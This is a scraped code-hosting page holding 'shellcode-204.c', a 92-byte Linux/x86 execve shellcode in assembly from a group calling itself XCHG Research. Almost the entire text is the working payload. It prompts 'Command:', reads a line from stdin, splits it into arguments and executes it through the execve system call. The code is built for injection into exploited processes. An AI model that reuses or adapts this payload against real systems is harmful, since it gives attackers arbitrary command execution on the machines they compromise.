-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathshellcode-204.c
More file actions
executable file
·80 lines (62 loc) · 1.34 KB
/
shellcode-204.c
File metadata and controls
executable file
·80 lines (62 loc) · 1.34 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
# XCHG Research Group
# Linux/x86 execve read shellcode - 92 bytes
#
#
# )--[ Writed by 0ut0fbound ]--(
#
# - http://outofbound.host.sk
# - http://xchglabs.host.sk
.text
.globl _start
_start:
# EAX = 0x04 -> syscall write()
xorl %eax, %eax
movb $0x4, %al
xorl %ebx, %ebx
inc %ebx
pushl $0x20202020
pushl $0x3a646e61
pushl $0x6d6d6f43
movl %esp, %ecx
xorl %edx, %edx
movb $0x9, %dl
int $0x80
# EAX = 0x03 -> syscall read()
xorl %eax, %eax
movb $0x3, %al
xorl %ebx, %ebx
xorl %edx, %edx
movb $0x20, %dl
subl %edx, %esp
movl %esp, %ecx
int $0x80
# buffer[read(0, buffer, sizeof(buffer))] = 0;
addl %eax, %ecx
dec %ecx
movl %ebx, (%ecx)
movl %esp, %ebx
addl %eax, %ebx
movl %eax, %ecx
xorl %edx, %edx
push %edx
LOOP1:
movb (%ebx), %al
cmp $0x20, %al
jne CONT
xorb $0x20, (%ebx)
inc %ebx
pushl %ebx
dec %ebx
CONT:
dec %ebx
loop LOOP1
push %ebx
movl %esp, %ecx
xorl %eax, %eax
movb $0xb, %al
int $0x80
# EAX = 0x01 -> syscall exit
xorl %eax, %eax
inc %al
xorl %ebx, %ebx
int $0x80